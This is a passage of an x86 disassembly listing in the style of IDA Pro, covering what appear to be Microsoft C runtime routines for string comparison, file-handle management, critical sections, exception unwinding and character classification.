push [ebp+arg_4]
push [ebp+arg_0]
call sub_40C8F9
add esp, 0Ch
cmp [ebp+var_4], bl
jz loc_40EB18
mov ecx, [ebp+var_8]
and dword ptr [ecx+70h], 0FFFFFFFDh
jmp loc_40EB18
; ---------------------------------------------------------------------------
loc_40EA16: ; CODE XREF: sub_40E9C7+27�j
cmp [ebp+arg_0], ebx
jnz short loc_40EA49
call sub_4057D3
push ebx
push ebx
push ebx
push ebx
push ebx
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
cmp [ebp+var_4], bl
jz short loc_40EA3F
mov eax, [ebp+var_8]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_40EA3F: ; CODE XREF: sub_40E9C7+6F�j
mov eax, 7FFFFFFFh
jmp loc_40EB18
; ---------------------------------------------------------------------------
loc_40EA49: ; CODE XREF: sub_40E9C7+52�j
push esi
mov esi, [ebp+arg_4]
cmp esi, ebx
jnz short loc_40EA7F
call sub_4057D3
push ebx
push ebx
push ebx
push ebx
push ebx
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
cmp [ebp+var_4], bl
jz short loc_40EA75
mov eax, [ebp+var_8]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_40EA75: ; CODE XREF: sub_40E9C7+A5�j
mov eax, 7FFFFFFFh
jmp loc_40EB17
; ---------------------------------------------------------------------------
loc_40EA7F: ; CODE XREF: sub_40E9C7+88�j
; sub_40E9C7+13C�j
mov eax, [ebp+arg_0]
movzx cx, byte ptr [eax]
dec [ebp+arg_8]
movzx ecx, cx
movzx edx, cl
inc eax
test byte ptr [edx+edi+1Dh], 4
mov [ebp+arg_0], eax
jz short loc_40EAC6
cmp [ebp+arg_8], ebx
jnz short loc_40EAB0
movzx eax, byte ptr [esi]
xor ecx, ecx
test byte ptr [eax+edi+1Dh], 4
jnz short loc_40EB09
movzx eax, ax
jmp short loc_40EAF6
; ---------------------------------------------------------------------------
loc_40EAB0: ; CODE XREF: sub_40E9C7+D6�j
mov al, [eax]
cmp al, bl
jnz short loc_40EABA
xor ecx, ecx
jmp short loc_40EAC6
; ---------------------------------------------------------------------------
loc_40EABA: ; CODE XREF: sub_40E9C7+ED�j
xor edx, edx
inc [ebp+arg_0]
mov dh, cl
mov dl, al
movzx ecx, dx
loc_40EAC6: ; CODE XREF: sub_40E9C7+D1�j
; sub_40E9C7+F1�j
movzx ax, byte ptr [esi]
movzx eax, ax
movzx edx, al
inc esi
test byte ptr [edx+edi+1Dh], 4
jz short loc_40EAF6
cmp [ebp+arg_8], ebx
jnz short loc_40EAE1
loc_40EADD: ; CODE XREF: sub_40E9C7+121�j
xor eax, eax
jmp short loc_40EAF6
; ---------------------------------------------------------------------------
loc_40EAE1: ; CODE XREF: sub_40E9C7+114�j
mov dl, [esi]
dec [ebp+arg_8]
cmp dl, bl
jz short loc_40EADD
xor ebx, ebx
mov bh, al
inc esi
mov bl, dl
movzx eax, bx
xor ebx, ebx
loc_40EAF6: ; CODE XREF: sub_40E9C7+E7�j
; sub_40E9C7+10F�j ...
cmp ax, cx
jnz short loc_40EB1C
cmp cx, bx
jz short loc_40EB09
cmp [ebp+arg_8], ebx
jnz loc_40EA7F
loc_40EB09: ; CODE XREF: sub_40E9C7+E2�j
; sub_40E9C7+137�j
cmp [ebp+var_4], bl
jz short loc_40EB15
mov eax, [ebp+var_8]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_40EB15: ; CODE XREF: sub_40E9C7+145�j
xor eax, eax
loc_40EB17: ; CODE XREF: sub_40E9C7+B3�j
; sub_40E9C7+15E�j ...
pop esi
loc_40EB18: ; CODE XREF: sub_40E9C7+3D�j
; sub_40E9C7+4A�j ...
pop edi
loc_40EB19: ; CODE XREF: sub_40E9C7+10�j
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_40EB1C: ; CODE XREF: sub_40E9C7+132�j
sbb eax, eax
and eax, 2
dec eax
cmp [ebp+var_4], bl
jz short loc_40EB17
mov ecx, [ebp+var_8]
and dword ptr [ecx+70h], 0FFFFFFFDh
jmp short loc_40EB17
sub_40E9C7 endp
; =============== S U B R O U T I N E =======================================
sub_40EB30 proc near ; CODE XREF: sub_4081FF+1D1�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push 0
push [esp+4+arg_8]
push [esp+8+arg_4]
push [esp+0Ch+arg_0]
call sub_40E9C7
add esp, 10h
retn
sub_40EB30 endp
; ---------------------------------------------------------------------------
align 4
push ebp
mov ebp, esp
push ebx
push esi
push edi
push ebp
push 0
push 0
push offset loc_40EB60
push dword ptr [ebp+8]
call sub_413976 ; RtlUnwind
loc_40EB60: ; DATA XREF: .text:0040EB53�o
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
loc_40EB68: ; DATA XREF: sub_40EBAD+B�o
; .text:0040EC3A�o
mov ecx, [esp+4]
test dword ptr [ecx+4], 6
mov eax, 1
jz short locret_40EBAC
mov eax, [esp+14h]
mov ecx, [eax-4]
xor ecx, eax
call sub_402710
push ebp
mov ebp, [eax+10h]
mov edx, [eax+28h]
push edx
mov edx, [eax+24h]
push edx
call sub_40EBAD
add esp, 8
pop ebp
mov eax, [esp+8]
mov edx, [esp+10h]
mov [edx], eax
mov eax, 3
locret_40EBAC: ; CODE XREF: .text:0040EB78�j
retn
; =============== S U B R O U T I N E =======================================
sub_40EBAD proc near ; CODE XREF: .text:0040EB94�p
var_20 = dword ptr -20h
var_18 = dword ptr -18h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
push edi
mov eax, [esp+0Ch+arg_0]
push ebp
push eax
push 0FFFFFFFEh
push offset loc_40EB68
push large dword ptr fs:0
mov eax, dword_423064
xor eax, esp
push eax
lea eax, [esp+24h+var_20]
mov large fs:0, eax
loc_40EBD6: ; CODE XREF: sub_40EBAD:loc_40EC1D�j
mov eax, [esp+24h+arg_0]
mov ebx, [eax+8]
mov esi, [eax+0Ch]
cmp esi, 0FFFFFFFFh
jz short loc_40EC1F
cmp [esp+24h+arg_4], 0FFFFFFFFh
jz short loc_40EBF2
cmp esi, [esp+24h+arg_4]
jbe short loc_40EC1F
loc_40EBF2: ; CODE XREF: sub_40EBAD+3D�j
lea esi, [esi+esi*2]
mov ecx, [ebx+esi*4]
mov [esp+24h+var_18], ecx
mov [eax+0Ch], ecx
cmp dword ptr [ebx+esi*4+4], 0
jnz short loc_40EC1D
push 101h
mov eax, [ebx+esi*4+8]
call sub_40EC5D
mov eax, [ebx+esi*4+8]
call sub_40EC7C
loc_40EC1D: ; CODE XREF: sub_40EBAD+57�j
jmp short loc_40EBD6
; ---------------------------------------------------------------------------
loc_40EC1F: ; CODE XREF: sub_40EBAD+36�j
; sub_40EBAD+43�j
mov ecx, [esp+24h+var_20]
mov large fs:0, ecx
add esp, 18h
pop edi
pop esi
pop ebx
retn
sub_40EBAD endp
; ---------------------------------------------------------------------------
xor eax, eax
mov ecx, large fs:0
cmp dword ptr [ecx+4], offset loc_40EB68
jnz short locret_40EC53
mov edx, [ecx+0Ch]
mov edx, [edx+0Ch]
cmp [ecx+8], edx
jnz short locret_40EC53
mov eax, 1
locret_40EC53: ; CODE XREF: .text:0040EC41�j
; .text:0040EC4C�j
retn
; =============== S U B R O U T I N E =======================================
sub_40EC54 proc near ; CODE XREF: sub_40BEF0+1E�p
; sub_40BEF0+40�p
push ebx
push ecx
mov ebx, offset dword_423FB0
jmp short loc_40EC68
sub_40EC54 endp
; =============== S U B R O U T I N E =======================================
sub_40EC5D proc near ; CODE XREF: sub_4085C8+6E�p
; sub_406640+2099�p ...
arg_0 = dword ptr 4
push ebx
push ecx
mov ebx, offset dword_423FB0
mov ecx, [esp+8+arg_0]
loc_40EC68: ; CODE XREF: sub_40EC54+7�j
mov [ebx+8], ecx
mov [ebx+4], eax
mov [ebx+0Ch], ebp
push ebp
push ecx
push eax
pop eax
pop ecx
pop ebp
pop ecx
pop ebx
retn 4
sub_40EC5D endp
; =============== S U B R O U T I N E =======================================
sub_40EC7C proc near ; CODE XREF: sub_4085C8+7B�p
; sub_40EBAD+6B�p
call eax
retn
sub_40EC7C endp
; =============== S U B R O U T I N E =======================================
sub_40EC7F proc near ; CODE XREF: sub_40E072+2BB�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
test eax, eax
push esi
push edi
jl short loc_40ECE3
cmp eax, dword_433C84
jnb short loc_40ECE3
mov esi, eax
and esi, 1Fh
imul esi, 28h
mov ecx, eax
sar ecx, 5
lea edi, ds:433CA0h[ecx*4]
mov ecx, [edi]
cmp dword ptr [esi+ecx], 0FFFFFFFFh
jnz short loc_40ECE3
cmp dword_423050, 1
push ebx
mov ebx, [esp+0Ch+arg_4]
jnz short loc_40ECD9
sub eax, 0
jz short loc_40ECD0
dec eax
jz short loc_40ECCB
dec eax
jnz short loc_40ECD9
push ebx
push 0FFFFFFF4h
jmp short loc_40ECD3
; ---------------------------------------------------------------------------
loc_40ECCB: ; CODE XREF: sub_40EC7F+42�j
push ebx
push 0FFFFFFF5h
jmp short loc_40ECD3
; ---------------------------------------------------------------------------
loc_40ECD0: ; CODE XREF: sub_40EC7F+3F�j
push ebx
push 0FFFFFFF6h
loc_40ECD3: ; CODE XREF: sub_40EC7F+4A�j
; sub_40EC7F+4F�j
call ds:dword_41D0BC ; SetStdHandle
loc_40ECD9: ; CODE XREF: sub_40EC7F+3A�j
; sub_40EC7F+45�j
mov eax, [edi]
mov [esi+eax], ebx
xor eax, eax
pop ebx
jmp short loc_40ECF9
; ---------------------------------------------------------------------------
loc_40ECE3: ; CODE XREF: sub_40EC7F+8�j
; sub_40EC7F+10�j ...
call sub_4057D3
mov dword ptr [eax], 9
call sub_4057E6
and dword ptr [eax], 0
or eax, 0FFFFFFFFh
loc_40ECF9: ; CODE XREF: sub_40EC7F+62�j
pop edi
pop esi
retn
sub_40EC7F endp
; =============== S U B R O U T I N E =======================================
sub_40ECFC proc near ; CODE XREF: sub_408A4D+62�p
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
push ebx
xor ebx, ebx
cmp ecx, ebx
push esi
push edi
jl short loc_40ED64
cmp ecx, dword_433C84
jnb short loc_40ED64
mov esi, ecx
and esi, 1Fh
imul esi, 28h
mov eax, ecx
sar eax, 5
lea edi, ds:433CA0h[eax*4]
mov eax, [edi]
add eax, esi
test byte ptr [eax+4], 1
jz short loc_40ED64
cmp dword ptr [eax], 0FFFFFFFFh
jz short loc_40ED64
cmp dword_423050, 1
jnz short loc_40ED5A
sub ecx, ebx
jz short loc_40ED51
dec ecx
jz short loc_40ED4C
dec ecx
jnz short loc_40ED5A
push ebx
push 0FFFFFFF4h
jmp short loc_40ED54
; ---------------------------------------------------------------------------
loc_40ED4C: ; CODE XREF: sub_40ECFC+46�j
push ebx
push 0FFFFFFF5h
jmp short loc_40ED54
; ---------------------------------------------------------------------------
loc_40ED51: ; CODE XREF: sub_40ECFC+43�j
push ebx
push 0FFFFFFF6h
loc_40ED54: ; CODE XREF: sub_40ECFC+4E�j
; sub_40ECFC+53�j
call ds:dword_41D0BC ; SetStdHandle
loc_40ED5A: ; CODE XREF: sub_40ECFC+3F�j
; sub_40ECFC+49�j
mov eax, [edi]
or dword ptr [esi+eax], 0FFFFFFFFh
xor eax, eax
jmp short loc_40ED79
; ---------------------------------------------------------------------------
loc_40ED64: ; CODE XREF: sub_40ECFC+B�j
; sub_40ECFC+13�j ...
call sub_4057D3
mov dword ptr [eax], 9
call sub_4057E6
mov [eax], ebx
or eax, 0FFFFFFFFh
loc_40ED79: ; CODE XREF: sub_40ECFC+66�j
pop edi
pop esi
pop ebx
retn
sub_40ECFC endp
; =============== S U B R O U T I N E =======================================
sub_40ED7D proc near ; CODE XREF: sub_408A4D+7�p
; sub_408A4D+2F�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp eax, 0FFFFFFFEh
jnz short loc_40ED9D
call sub_4057E6
and dword ptr [eax], 0
call sub_4057D3
mov dword ptr [eax], 9
or eax, 0FFFFFFFFh
retn
; ---------------------------------------------------------------------------
loc_40ED9D: ; CODE XREF: sub_40ED7D+7�j
push esi
xor esi, esi
cmp eax, esi
jl short loc_40EDC6
cmp eax, dword_433C84
jnb short loc_40EDC6
mov ecx, eax
and eax, 1Fh
imul eax, 28h
sar ecx, 5
mov ecx, dword_433CA0[ecx*4]
add eax, ecx
test byte ptr [eax+4], 1
jnz short loc_40EDEA
loc_40EDC6: ; CODE XREF: sub_40ED7D+25�j
; sub_40ED7D+2D�j
call sub_4057E6
mov [eax], esi
call sub_4057D3
push esi
push esi
push esi
push esi
push esi
mov dword ptr [eax], 9
call sub_402F39
add esp, 14h
or eax, 0FFFFFFFFh
pop esi
retn
; ---------------------------------------------------------------------------
loc_40EDEA: ; CODE XREF: sub_40ED7D+47�j
mov eax, [eax]
pop esi
retn
sub_40ED7D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40EDEE proc near ; CODE XREF: sub_408AE1+7F�p
; sub_40A34F+7F�p ...
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 0Ch
push offset dword_421880
call __SEH_prolog4
mov edi, [ebp+arg_0]
mov eax, edi
sar eax, 5
mov esi, edi
and esi, 1Fh
imul esi, 28h
add esi, dword_433CA0[eax*4]
mov [ebp+var_1C], 1
xor ebx, ebx
cmp [esi+8], ebx
jnz short loc_40EE55
push 0Ah
call sub_4059F7
pop ecx
mov [ebp+ms_exc.disabled], ebx
cmp [esi+8], ebx
jnz short loc_40EE49
push 0FA0h
lea eax, [esi+0Ch]
push eax
call sub_40CB14
pop ecx
pop ecx
test eax, eax
jnz short loc_40EE46
mov [ebp+var_1C], ebx
loc_40EE46: ; CODE XREF: sub_40EDEE+53�j
inc dword ptr [esi+8]
loc_40EE49: ; CODE XREF: sub_40EDEE+3F�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_40EE85
loc_40EE55: ; CODE XREF: sub_40EDEE+2F�j
cmp [ebp+var_1C], ebx
jz short loc_40EE77
mov eax, edi
sar eax, 5
and edi, 1Fh
imul edi, 28h
mov eax, dword_433CA0[eax*4]
lea eax, [eax+edi+0Ch]
push eax
call ds:dword_41D168 ; RtlEnterCriticalSection
loc_40EE77: ; CODE XREF: sub_40EDEE+6A�j
mov eax, [ebp+var_1C]
call __SEH_epilog4
retn
sub_40EDEE endp
; =============== S U B R O U T I N E =======================================
sub_40EE80 proc near ; DATA XREF: .rdata:00421898�o
xor ebx, ebx
mov edi, [ebp+8]
sub_40EE80 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40EE85 proc near ; CODE XREF: sub_40EDEE+62�p
push 0Ah
call sub_40591F
pop ecx
retn
sub_40EE85 endp
; =============== S U B R O U T I N E =======================================
sub_40EE8E proc near ; CODE XREF: sub_408BA4+3�p
; sub_40A421+3�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ecx, eax
and eax, 1Fh
imul eax, 28h
sar ecx, 5
mov ecx, dword_433CA0[ecx*4]
lea eax, [ecx+eax+0Ch]
push eax
call ds:dword_41D16C ; RtlLeaveCriticalSection
retn
sub_40EE8E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40EEB0 proc near ; CODE XREF: sub_40E072:loc_40E268�p
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
; FUNCTION CHUNK AT 0040EF8C SIZE 000000BA BYTES
push 18h
push offset dword_4218A0
call __SEH_prolog4
or [ebp+var_1C], 0FFFFFFFFh
xor edi, edi
mov [ebp+var_24], edi
push 0Bh
call sub_405934
pop ecx
test eax, eax
jnz short loc_40EED9
or eax, 0FFFFFFFFh
jmp loc_40F040
; ---------------------------------------------------------------------------
loc_40EED9: ; CODE XREF: sub_40EEB0+1F�j
push 0Bh
call sub_4059F7
pop ecx
mov [ebp+ms_exc.disabled], edi
loc_40EEE4: ; CODE XREF: sub_40EEB0+109�j
mov [ebp+var_28], edi
cmp edi, 40h
jge loc_40F031
mov esi, dword_433CA0[edi*4]
test esi, esi
jz loc_40EFBE
loc_40EEFF: ; CODE XREF: sub_40EEB0+CB�j
mov [ebp+var_20], esi
mov eax, dword_433CA0[edi*4]
add eax, 500h
cmp esi, eax
jnb loc_40EFB2
test byte ptr [esi+4], 1
jnz short loc_40EF78
cmp dword ptr [esi+8], 0
jnz short loc_40EF5B
push 0Ah
call sub_4059F7
pop ecx
xor ebx, ebx
inc ebx
mov [ebp+ms_exc.disabled], ebx
cmp dword ptr [esi+8], 0
jnz short loc_40EF52
push 0FA0h
lea eax, [esi+0Ch]
push eax
call sub_40CB14
pop ecx
pop ecx
test eax, eax
jnz short loc_40EF4F
mov [ebp+var_24], ebx
jmp short loc_40EF52
; ---------------------------------------------------------------------------
loc_40EF4F: ; CODE XREF: sub_40EEB0+98�j
inc dword ptr [esi+8]
loc_40EF52: ; CODE XREF: sub_40EEB0+84�j
; sub_40EEB0+9D�j
and [ebp+ms_exc.disabled], 0
call sub_40EF83
loc_40EF5B: ; CODE XREF: sub_40EEB0+70�j
cmp [ebp+var_24], 0
jnz short loc_40EF78
lea ebx, [esi+0Ch]
push ebx
call ds:dword_41D168 ; RtlEnterCriticalSection
test byte ptr [esi+4], 1
jz short loc_40EF8C
push ebx
call ds:dword_41D16C ; RtlLeaveCriticalSection
loc_40EF78: ; CODE XREF: sub_40EEB0+6A�j
; sub_40EEB0+AF�j ...
add esi, 28h
jmp short loc_40EEFF
sub_40EEB0 endp
; =============== S U B R O U T I N E =======================================
sub_40EF7D proc near ; DATA XREF: .rdata:004218C4�o
mov edi, [ebp-28h]
mov esi, [ebp-20h]
sub_40EF7D endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40EF83 proc near ; CODE XREF: sub_40EEB0+A6�p
push 0Ah
call sub_40591F
pop ecx
retn
sub_40EF83 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_40EEB0
loc_40EF8C: ; CODE XREF: sub_40EEB0+BF�j
cmp [ebp+var_24], 0
jnz short loc_40EF78
mov byte ptr [esi+4], 1
or dword ptr [esi], 0FFFFFFFFh
mov eax, esi
sub eax, dword_433CA0[edi*4]
cdq
push 28h
pop ecx
idiv ecx
mov ecx, edi
shl ecx, 5
add eax, ecx
mov [ebp+var_1C], eax
loc_40EFB2: ; CODE XREF: sub_40EEB0+60�j
cmp [ebp+var_1C], 0FFFFFFFFh
jnz short loc_40F031
inc edi
jmp loc_40EEE4
; ---------------------------------------------------------------------------
loc_40EFBE: ; CODE XREF: sub_40EEB0+49�j
push 28h
push 20h
call sub_40777A
pop ecx
pop ecx
mov [ebp+var_20], eax
test eax, eax
jz short loc_40F031
lea ecx, ds:433CA0h[edi*4]
mov [ecx], eax
add dword_433C84, 20h
loc_40EFE0: ; CODE XREF: sub_40EEB0+151�j
mov edx, [ecx]
add edx, 500h
cmp eax, edx
jnb short loc_40F003
mov byte ptr [eax+4], 0
or dword ptr [eax], 0FFFFFFFFh
mov byte ptr [eax+5], 0Ah
and dword ptr [eax+8], 0
add eax, 28h
mov [ebp+var_20], eax
jmp short loc_40EFE0
; ---------------------------------------------------------------------------
loc_40F003: ; CODE XREF: sub_40EEB0+13A�j
shl edi, 5
mov [ebp+var_1C], edi
mov eax, edi
sar eax, 5
mov ecx, edi
and ecx, 1Fh
imul ecx, 28h
mov eax, dword_433CA0[eax*4]
mov byte ptr [eax+ecx+4], 1
push edi
call sub_40EDEE
pop ecx
test eax, eax
jnz short loc_40F031
or [ebp+var_1C], 0FFFFFFFFh
loc_40F031: ; CODE XREF: sub_40EEB0+3A�j
; sub_40EEB0+106�j ...
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_40F046
mov eax, [ebp+var_1C]
loc_40F040: ; CODE XREF: sub_40EEB0+24�j
call __SEH_epilog4
retn
; END OF FUNCTION CHUNK FOR sub_40EEB0
; =============== S U B R O U T I N E =======================================
sub_40F046 proc near ; CODE XREF: sub_40EEB0+188�p
; DATA XREF: .rdata:004218B8�o
push 0Bh
call sub_40591F
pop ecx
retn
sub_40F046 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F04F proc near ; CODE XREF: sub_408C3C+31�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 10h
push offset dword_4218C8
call __SEH_prolog4
mov eax, [ebp+arg_0]
cmp eax, 0FFFFFFFEh
jnz short loc_40F076
call sub_4057D3
mov dword ptr [eax], 9
loc_40F06E: ; CODE XREF: sub_40F04F+4D�j
or eax, 0FFFFFFFFh
jmp loc_40F120
; ---------------------------------------------------------------------------
loc_40F076: ; CODE XREF: sub_40F04F+12�j
xor ebx, ebx
cmp eax, ebx
jl short loc_40F084
cmp eax, dword_433C84
jb short loc_40F09E
loc_40F084: ; CODE XREF: sub_40F04F+2B�j
; sub_40F04F+6D�j
call sub_4057D3
mov dword ptr [eax], 9
push ebx
push ebx
push ebx
push ebx
push ebx
call sub_402F39
add esp, 14h
jmp short loc_40F06E
; ---------------------------------------------------------------------------
loc_40F09E: ; CODE XREF: sub_40F04F+33�j
mov ecx, eax
sar ecx, 5
lea edi, ds:433CA0h[ecx*4]
mov esi, eax
and esi, 1Fh
imul esi, 28h
mov ecx, [edi]
movzx ecx, byte ptr [esi+ecx+4]
and ecx, 1
jz short loc_40F084
push eax
call sub_40EDEE
pop ecx
mov [ebp+ms_exc.disabled], ebx
mov eax, [edi]
test byte ptr [esi+eax+4], 1
jz short loc_40F102
push [ebp+arg_0]
call sub_40ED7D
pop ecx
push eax
call ds:dword_41D0B8 ; FlushFileBuffers
test eax, eax
jnz short loc_40F0F0
call ds:dword_41D0F0 ; RtlGetLastWin32Error
mov [ebp+var_1C], eax
jmp short loc_40F0F3
; ---------------------------------------------------------------------------
loc_40F0F0: ; CODE XREF: sub_40F04F+94�j
mov [ebp+var_1C], ebx
loc_40F0F3: ; CODE XREF: sub_40F04F+9F�j
cmp [ebp+var_1C], ebx
jz short loc_40F111
call sub_4057E6
mov ecx, [ebp+var_1C]
mov [eax], ecx
loc_40F102: ; CODE XREF: sub_40F04F+80�j
call sub_4057D3
mov dword ptr [eax], 9
or [ebp+var_1C], 0FFFFFFFFh
loc_40F111: ; CODE XREF: sub_40F04F+A7�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_40F126
mov eax, [ebp+var_1C]
loc_40F120: ; CODE XREF: sub_40F04F+22�j
call __SEH_epilog4
retn
sub_40F04F endp
; =============== S U B R O U T I N E =======================================
sub_40F126 proc near ; CODE XREF: sub_40F04F+C9�p
; DATA XREF: .rdata:004218E0�o
push dword ptr [ebp+8]
call sub_40EE8E
pop ecx
retn
sub_40F126 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F130 proc near ; CODE XREF: sub_40F17F+21�p
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push [ebp+arg_4]
lea ecx, [ebp+var_10]
call sub_40271F
mov eax, [ebp+var_10]
cmp dword ptr [eax+0ACh], 1
jle short loc_40F160
lea eax, [ebp+var_10]
push eax
push 4
push [ebp+arg_0]
call sub_40CA44
add esp, 0Ch
jmp short loc_40F170
; ---------------------------------------------------------------------------
loc_40F160: ; CODE XREF: sub_40F130+1B�j
mov eax, [eax+0C8h]
mov ecx, [ebp+arg_0]
movzx eax, byte ptr [eax+ecx*2]
and eax, 4
loc_40F170: ; CODE XREF: sub_40F130+2E�j
cmp [ebp+var_4], 0
jz short locret_40F17D
mov ecx, [ebp+var_8]
and dword ptr [ecx+70h], 0FFFFFFFDh
locret_40F17D: ; CODE XREF: sub_40F130+44�j
leave
retn
sub_40F130 endp
; =============== S U B R O U T I N E =======================================
sub_40F17F proc near ; CODE XREF: sub_408E67+1B6�p
; sub_408E67+3EF�p ...
arg_0 = dword ptr 4
cmp dword_425DE0, 0
jnz short loc_40F19A
mov eax, [esp+arg_0]
mov ecx, off_423668
movzx eax, byte ptr [ecx+eax*2]
and eax, 4
retn
; ---------------------------------------------------------------------------
loc_40F19A: ; CODE XREF: sub_40F17F+7�j
push 0
push [esp+4+arg_0]
call sub_40F130
pop ecx
pop ecx
retn
sub_40F17F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F1A8 proc near ; CODE XREF: sub_40F1FC+23�p
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push [ebp+arg_4]
lea ecx, [ebp+var_10]
call sub_40271F
mov eax, [ebp+var_10]
cmp dword ptr [eax+0ACh], 1
jle short loc_40F1DB
lea eax, [ebp+var_10]
push eax
push 80h
push [ebp+arg_0]
call sub_40CA44
add esp, 0Ch
jmp short loc_40F1ED
; ---------------------------------------------------------------------------
loc_40F1DB: ; CODE XREF: sub_40F1A8+1B�j
mov eax, [eax+0C8h]
mov ecx, [ebp+arg_0]
movzx eax, byte ptr [eax+ecx*2]
and eax, 80h
loc_40F1ED: ; CODE XREF: sub_40F1A8+31�j
cmp [ebp+var_4], 0
jz short locret_40F1FA
mov ecx, [ebp+var_8]
and dword ptr [ecx+70h], 0FFFFFFFDh
locret_40F1FA: ; CODE XREF: sub_40F1A8+49�j
leave
retn
sub_40F1A8 endp
; =============== S U B R O U T I N E =======================================
sub_40F1FC proc near ; CODE XREF: sub_408E67+9DF�p
; sub_408E67+AB7�p
arg_0 = dword ptr 4
cmp dword_425DE0, 0
jnz short loc_40F219
mov eax, [esp+arg_0]
mov ecx, off_423668
movzx eax, byte ptr [ecx+eax*2]
and eax, 80h
retn
; ---------------------------------------------------------------------------
loc_40F219: ; CODE XREF: sub_40F1FC+7�j
push 0
push [esp+4+arg_0]
call sub_40F1A8
pop ecx
pop ecx
retn
sub_40F1FC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F227 proc near ; CODE XREF: sub_40F276+21�p
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push [ebp+arg_4]
lea ecx, [ebp+var_10]
call sub_40271F
mov eax, [ebp+var_10]
cmp dword ptr [eax+0ACh], 1
jle short loc_40F257
lea eax, [ebp+var_10]
push eax
push 8
push [ebp+arg_0]
call sub_40CA44
add esp, 0Ch
jmp short loc_40F267
; ---------------------------------------------------------------------------
loc_40F257: ; CODE XREF: sub_40F227+1B�j
mov eax, [eax+0C8h]
mov ecx, [ebp+arg_0]
movzx eax, byte ptr [eax+ecx*2]
and eax, 8
loc_40F267: ; CODE XREF: sub_40F227+2E�j
cmp [ebp+var_4], 0
jz short locret_40F274
mov ecx, [ebp+var_8]
and dword ptr [ecx+70h], 0FFFFFFFDh
locret_40F274: ; CODE XREF: sub_40F227+44�j
leave
retn
sub_40F227 endp
; =============== S U B R O U T I N E =======================================
sub_40F276 proc near ; CODE XREF: sub_408E42+17�p
; sub_408E67+13C�p ...
arg_0 = dword ptr 4
cmp dword_425DE0, 0
jnz short loc_40F291
mov eax, [esp+arg_0]
mov ecx, off_423668
movzx eax, byte ptr [ecx+eax*2]
and eax, 8
retn
; ---------------------------------------------------------------------------
loc_40F291: ; CODE XREF: sub_40F276+7�j
push 0
push [esp+4+arg_0]
call sub_40F227
pop ecx
pop ecx
retn
sub_40F276 endp
; =============== S U B R O U T I N E =======================================
sub_40F29F proc near ; CODE XREF: sub_408E67+15E�p
; sub_408E67+5BE�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push ebp
push esi
mov esi, [esp+0Ch+arg_4]
or ebp, 0FFFFFFFFh
test byte ptr [esi+0Ch], 40h
push edi
jnz loc_40F35C
push esi
call sub_408A20
cmp eax, ebp
pop ecx
mov ebx, offset dword_423BD0
jz short loc_40F2F2
push esi
call sub_408A20
cmp eax, 0FFFFFFFEh
pop ecx
jz short loc_40F2F2
push esi
call sub_408A20
sar eax, 5
push esi
lea edi, ds:433CA0h[eax*4]
call sub_408A20
and eax, 1Fh
imul eax, 28h
add eax, [edi]
pop ecx
pop ecx
jmp short loc_40F2F4
; ---------------------------------------------------------------------------
loc_40F2F2: ; CODE XREF: sub_40F29F+23�j
; sub_40F29F+2F�j
mov eax, ebx
loc_40F2F4: ; CODE XREF: sub_40F29F+51�j
test byte ptr [eax+24h], 7Fh
jnz short loc_40F33B
push esi
call sub_408A20
cmp eax, ebp
pop ecx
jz short loc_40F333
push esi
call sub_408A20
cmp eax, 0FFFFFFFEh
pop ecx
jz short loc_40F333
push esi
call sub_408A20
sar eax, 5
push esi
lea edi, ds:433CA0h[eax*4]
call sub_408A20
and eax, 1Fh
imul eax, 28h
add eax, [edi]
pop ecx
pop ecx
jmp short loc_40F335
; ---------------------------------------------------------------------------
loc_40F333: ; CODE XREF: sub_40F29F+64�j
; sub_40F29F+70�j
mov eax, ebx
loc_40F335: ; CODE XREF: sub_40F29F+92�j
test byte ptr [eax+24h], 80h
jz short loc_40F35C
loc_40F33B: ; CODE XREF: sub_40F29F+59�j
call sub_4057D3
xor edi, edi
push edi
push edi
push edi
push edi
push edi
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
loc_40F355: ; CODE XREF: sub_40F29F+C3�j
